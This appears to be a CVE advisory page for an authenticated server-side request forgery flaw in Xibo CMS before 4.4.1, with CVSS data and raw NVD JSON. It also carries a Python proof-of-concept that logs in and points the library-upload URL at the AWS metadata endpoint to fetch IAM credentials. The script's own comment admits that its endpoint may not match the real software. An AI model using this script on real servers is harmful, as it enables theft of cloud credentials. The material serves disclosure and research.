Security Vulnerability Report
中文
CVE-2026-42141 CVSS 7.7 HIGH

CVE-2026-42141

Published: 2026-05-12 18:17:24
Last Modified: 2026-05-13 15:43:05
Source: [email protected]

Description

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Xibo CMS < 4.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL TARGET_URL = "http://target-xibo-cms.com" # Login credentials USERNAME = "attacker" PASSWORD = "password" # SSRF Payload targeting internal metadata SSRF_PAYLOAD = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" def exploit_ssrf(): session = requests.Session() # Step 1: Authenticate to get session cookie login_data = {"username": USERNAME, "password": PASSWORD} login_resp = session.post(f"{TARGET_URL}/login", data=login_data) if login_resp.status_code != 200: print("Login failed") return print("[+] Login successful") # Step 2: Send SSRF request via Library Upload functionality # Note: The specific endpoint and parameter name might vary based on version upload_headers = {"Content-Type": "application/json"} exploit_data = { "name": "test_image", "url": SSRF_PAYLOAD, # Vulnerable parameter "isUpload": 1 } exploit_resp = session.post(f"{TARGET_URL}/api/library", json=exploit_data, headers=upload_headers) if exploit_resp.status_code == 200: print("[+] SSRF request sent successfully") print(f"[+] Response body:\n{exploit_resp.text}") else: print("[-] Exploit failed") print(exploit_resp.text) if __name__ == "__main__": exploit_ssrf()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42141", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:23.920", "lastModified": "2026-05-13T15:43:05.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests from the CMS server to internal or external network resources. This can be exploited to scan internal infrastructure, access local cloud metadata endpoints (e.g., AWS IMDS), interact with internal services that lack authentication, or exfiltrate data. This vulnerability is fixed in 4.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/xibosignage/xibo-cms/security/advisories/GHSA-fwq8-c4gw-pxmh", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.